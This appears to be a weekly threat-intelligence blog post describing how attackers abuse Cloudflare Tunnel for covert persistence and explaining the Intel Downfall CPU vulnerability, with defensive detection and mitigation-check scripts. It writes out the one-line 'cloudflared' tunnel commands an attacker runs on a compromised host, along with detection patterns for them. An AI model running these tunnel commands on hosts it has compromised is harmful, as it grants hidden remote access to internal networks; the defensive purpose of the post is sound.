Welcome back to another week of Cyber Threat Intelligence (CTI). This week's report highlights how threat actors are abusing the legitimate Cloudflare service ‘Cloudflare Tunnel’ to establish persistence and obfuscate activity and a new side-channel attack ‘Downfall’ disclosed for Intel processors.
Per Cloudflare's documentation, Cloudflare Tunnel provides a secure way to connect resources to Cloudflare without a publicly routable IP address. Rather than exposing an inbound listener, the 'cloudflared' daemon creates outbound-only connections to the Cloudflare global network, which is exactly why the traffic blends in with ordinary egress. The Tunnel supports connections to HTTP servers, SSH servers, remote desktops, and other protocols.
Threat actor configures the Tunnel environment on their Cloudflare account.
Threat actor gains access to the victim's machine via traditional methods (e.g. phishing, social engineering, remote exploit).
Threat actor issues just a single command on the victim machine, establishing a persistent tunnel back to the attacker-controlled Cloudflare environment.
The only parameter that needs to be passed on the command line is the token associated with the tunnel the threat actor created; no local configuration file is required.
cloudflared tunnel run --token <token from Cloudflare>
Private-network routes are configured on the Cloudflare side and pushed to the already-running tunnel, so they are not reflected in the configuration cloudflared reports on the command line or in any file on the host. A defender who finds the process sees only a token, not what the tunnel exposes.
Once a route is in place, the threat actor can interact with any device on the routed 'private network' that the compromised host can reach, not just services on the host itself.
Cloudflare Tunnel allows entire CIDR ranges to be routed through a single tunnel, so one compromised machine can expose an internal subnet.
It should also be noted that Cloudflare has a TryCloudflare feature, which allows users to create a temporary 'quick tunnel' with a random trycloudflare.com hostname and no Cloudflare account. This setup process would allow a threat actor to create a tunnel without providing identifying information to Cloudflare for attribution.
cloudflared tunnel --url http://localhost:<port>
While the tunnel itself provides a great layer of obfuscation for the threat actor, several indicators can be monitored for this type of activity:
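As an added example (not PacketWatch's or Cloudflare's code), the script below hunts for the behaviour described above in endpoint telemetry: a `cloudflared tunnel run --token` or `cloudflared tunnel --url` command line (matched on the arguments, so a renamed binary is still caught), DNS queries for the Cloudflare edge names cloudflared contacts (`*.argotunnel.com`, `*.trycloudflare.com`), and outbound connections to the tunnel transport port 7844. When a named-tunnel token is found it decodes the account tag and tunnel ID (cloudflared tokens are base64 JSON with keys `a`, `t` and `s`; the secret is deliberately not returned), which is what you would hand to Cloudflare's abuse team. The `source|host|value` log format, the sample lines and the sample token are constructed for this example.

```python
"""Hunt for cloudflared tunnel activity in constructed endpoint telemetry."""
import base64
import json
import re

TUNNEL_PORT = 7844                                   # cloudflared edge transport port
EDGE_DOMAIN_SUFFIXES = (".argotunnel.com", ".trycloudflare.com")
TOKEN_RUN = re.compile(r"\btunnel\s+run\b.*?--token\s+(\S+)")   # named tunnel
QUICK_TUNNEL = re.compile(r"\btunnel\s+--url\s+(\S+)")          # TryCloudflare quick tunnel


def decode_tunnel_token(token):
    """Return the account tag and tunnel ID carried in a cloudflared token.

    Tokens are base64-encoded JSON with keys "a" (account tag), "t" (tunnel ID)
    and "s" (tunnel secret). The secret is not returned; anything that does not
    decode to that shape yields None.
    """
    padded = token + "=" * (-len(token) % 4)
    try:
        data = json.loads(base64.b64decode(padded, validate=True))
    except (ValueError, TypeError):
        return None
    if not isinstance(data, dict) or "a" not in data or "t" not in data:
        return None
    return {"account_tag": data["a"], "tunnel_id": data["t"]}


def scan(lines):
    """Return one finding per suspicious line.

    Constructed line format: 'source|host|value', where source is
    proc (process command line), dns (queried name) or net (dest ip:port).
    """
    findings = []
    for line in lines:
        source, host, value = line.split("|", 2)
        if source == "proc":
            m = TOKEN_RUN.search(value)
            if m:
                info = decode_tunnel_token(m.group(1))
                findings.append({"host": host, "indicator": "named_tunnel",
                                 "detail": info or "undecodable token"})
                continue
            m = QUICK_TUNNEL.search(value)
            if m:
                findings.append({"host": host, "indicator": "quick_tunnel",
                                 "detail": m.group(1)})
        elif source == "dns":
            if value.lower().endswith(EDGE_DOMAIN_SUFFIXES):
                findings.append({"host": host, "indicator": "edge_dns", "detail": value})
        elif source == "net":
            _ip, _sep, port = value.rpartition(":")
            if port.isdigit() and int(port) == TUNNEL_PORT:
                findings.append({"host": host, "indicator": "edge_port", "detail": value})
    return findings


# Constructed token in the shape cloudflared expects, with placeholder values.
SAMPLE_TOKEN = base64.b64encode(json.dumps(
    {"a": "0123456789abcdef0123456789abcdef",
     "t": "11111111-2222-3333-4444-555555555555",
     "s": "c2VjcmV0"}).encode()).decode()

# Constructed telemetry: host01 runs a renamed cloudflared with a named tunnel,
# host02 is benign, host03 uses a TryCloudflare quick tunnel to expose RDP.
SAMPLE_LOGS = [
    f"proc|host01|C:\\Temp\\svchost.exe tunnel run --token {SAMPLE_TOKEN}",
    "dns|host01|region1.v2.argotunnel.com",
    "net|host01|192.0.2.10:7844",
    "proc|host02|C:\\Program Files\\Mozilla Firefox\\firefox.exe -profile x",
    "dns|host02|www.example.com",
    "proc|host03|/tmp/cf tunnel --url http://localhost:3389",
    "dns|host03|api.trycloudflare.com",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOGS):
        print(finding)
```

Matching on the `tunnel run --token` arguments rather than the image name matters because the binary is trivially renamed; the DNS and port checks catch the case where command-line logging is not available at all.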
Downfall (CVE-2022-40982, also called Gather Data Sampling) affects Intel client and server CPUs from the 6th generation (Skylake) through the 11th generation (Tiger Lake). A full list of vulnerable CPU models can be found on Intel's site here.
For this vulnerability to be successfully exploited, the threat actor's code must run on the same physical processor core as the victim's, either as a sibling hyperthread or time-sliced on that core. This scenario is most common in cloud computing, where tenants share hardware. The threat actor would need to get a malicious payload onto the host (or a co-tenant VM) and execute it on the same core as the victim. Given the specific conditions that need to be met to carry out the attack, the overall risk is considered to be low. However, proof-of-concept code has been published to GitHub, as well as detailed research and documentation of the vulnerability, making public exploitation a possibility.
Intel has released a microcode update that mitigates the vulnerability, which can be found here. Additional information from Intel regarding the vulnerability can be found here.
It should be noted that applying this update can result in up to 50% performance degradation in workloads that make heavy use of the affected Gather instructions (Intel's own figure); typical workloads see far less. Organizations must decide if negating the risk of exploitation is worth the performance penalty. Note that the trade-off does not have to be made at the microcode level: on Linux the mitigation can be switched off with the `gather_data_sampling=off` boot parameter while the microcode stays installed, and the kernel reports the resulting state in sysfs.
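As an added example (not Intel's or PacketWatch's code), the following script reads the Linux kernel's Downfall status from `/sys/devices/system/cpu/vulnerabilities/gather_data_sampling` (present on kernels that carry the GDS patches) together with `/proc/cmdline`, and turns it into a verdict and a recommended action. The status strings it recognises are the ones the kernel documents; the sample inputs in the test are constructed.

```python
"""Report a Linux host's Downfall (Gather Data Sampling) mitigation state."""
import pathlib

GDS_SYSFS = pathlib.Path("/sys/devices/system/cpu/vulnerabilities/gather_data_sampling")
CMDLINE = pathlib.Path("/proc/cmdline")

# Boot parameters that disable the GDS mitigation even when microcode is present.
OPT_OUT_PARAMS = {"gather_data_sampling=off", "mitigations=off"}


def classify_gds(status, cmdline=""):
    """Map the kernel's sysfs status text (plus boot parameters) to a verdict.

    Kernel status strings: "Not affected", "Vulnerable",
    "Vulnerable: No microcode", "Mitigation: Microcode",
    "Mitigation: Microcode (locked)", "Unknown: Dependent on hypervisor status".
    """
    s = status.strip()
    opt_outs = sorted(OPT_OUT_PARAMS.intersection(cmdline.split()))

    if s == "Not affected":
        return {"affected": False, "mitigated": True, "action": "none"}
    if s.startswith("Mitigation:"):
        # "(locked)" means firmware prevents the OS from turning it back off.
        action = "none" if "(locked)" in s else "optional: lock the mitigation in firmware"
        return {"affected": True, "mitigated": True, "action": action}
    if s == "Vulnerable: No microcode":
        return {"affected": True, "mitigated": False,
                "action": "apply the Intel microcode update (or a firmware update that carries it)"}
    if s == "Vulnerable":
        if opt_outs:
            action = "mitigation disabled by boot parameter(s): " + ", ".join(opt_outs)
        else:
            action = "microcode present but mitigation off; check boot parameters and kernel version"
        return {"affected": True, "mitigated": False, "action": action}
    if s.startswith("Unknown"):
        return {"affected": None, "mitigated": None,
                "action": "guest cannot see microcode state; confirm with the hypervisor provider"}
    return {"affected": None, "mitigated": None, "action": f"unrecognised status: {s!r}"}


def check_host():
    """Classify the running host; reports a gap if the kernel lacks GDS reporting."""
    if not GDS_SYSFS.exists():
        return {"affected": None, "mitigated": None,
                "action": "kernel does not report gather_data_sampling; update the kernel first"}
    cmdline = CMDLINE.read_text() if CMDLINE.exists() else ""
    return classify_gds(GDS_SYSFS.read_text(), cmdline)


if __name__ == "__main__":
    print(check_host())
```

The "Vulnerable" plus `gather_data_sampling=off` case is the one to watch for in an estate that chose performance over mitigation: the microcode is installed, so a package inventory looks clean, but the protection is off.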
PacketWatch publishes this report and other cybersecurity threat intel to the security community for free via our blog. If you are interested in personalized threat intel, contact us today to learn about our enterprise threat intelligence services.
Kindly be advised that the information contained in this article is presented with no final evaluation and should be considered raw data. The sole purpose of this information is to provide situational awareness based on the currently available knowledge. We recommend exercising caution and conducting further research as necessary before making any decisions based on this information.